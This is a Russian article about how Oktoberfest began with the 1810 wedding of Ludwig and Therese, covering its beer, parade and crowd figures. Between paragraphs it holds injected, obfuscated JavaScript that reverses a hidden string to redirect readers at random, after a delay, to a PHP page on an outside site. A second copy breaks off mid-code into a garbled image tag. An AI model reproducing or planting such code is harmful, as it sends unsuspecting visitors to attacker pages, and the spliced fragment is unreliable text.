Как отметить годовщину свадьбы?

А знаете ли вы, что история праздника Октоберфест началась в октябре 1810 года, когда принц Баварии Людвиг и принцесса Саксонии Тереза праздновали свадьбу? По желанию невесты на праздник пригласили все население Мюнхена. Состоялись скачки, ну а количество выпитого пива измерить просто невозможно! Праздник так понравился горожанам, что луг, где проходило гуляние, назвали именем Терезы. В 1811 году к годовщине свадьбы несколько мюнхенских пивоварен сварили специальное «октябрьское пиво». Его можно и теперь приобрести только в это время года. Оно выдерживается дольше обычного светлого, имеет ярко выраженный солодовый вкус и крепость от 5.8 до 6.3%. Любящий супруг Людвиг «накрывал поляну» для октябрьских народный гуляний еще 5 лет, а затем инициативу перехватил муниципалитет Мюнхена.

$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toberfest-968232_1280-1024×682.jpg” alt=”” width=”1024″ height=”682″ />

В 1881 г. на лугу Терезы открылась первая жарильня курочек, а в 1892 пиво впервые стали подавать в привычных сейчас стеклянных кружках (раньше обходились керамическими). Серебряную годовщину свадьбы Людвиг и Тереза отметили грандиозным костюмированным шествием, ставшим впоследствии традицией. Праздник до сих пор открывает красочное шествие хозяев пивных палаток, которое возглавляет обер-бургомистр Мюнхена. Затем он же вбивает кран в первую бочку праздничного пива с характерным восклицанием «O’zapft is!» (Откупорено!). Сейчас Октоберфест – это самое большое народное гуляние в мире, на него собирается до 6 млн человек, которые выпивают около 9 млн литров пива!

Конечно, не каждая женщина согласится, чтобы день ее свадьбы отмечали столь повальным пьянством, но то, что эта традиция живет уже 200 лет, говорит о знании королем Людвигом своего народа. Еще бы, ведь его род – Виттельсбахов – правил в Мюнхене в общей сложности 738 лет!

Источники: Wikipedia (Октоберфест).
АлкогольГерманияЕвропаПивоПраздники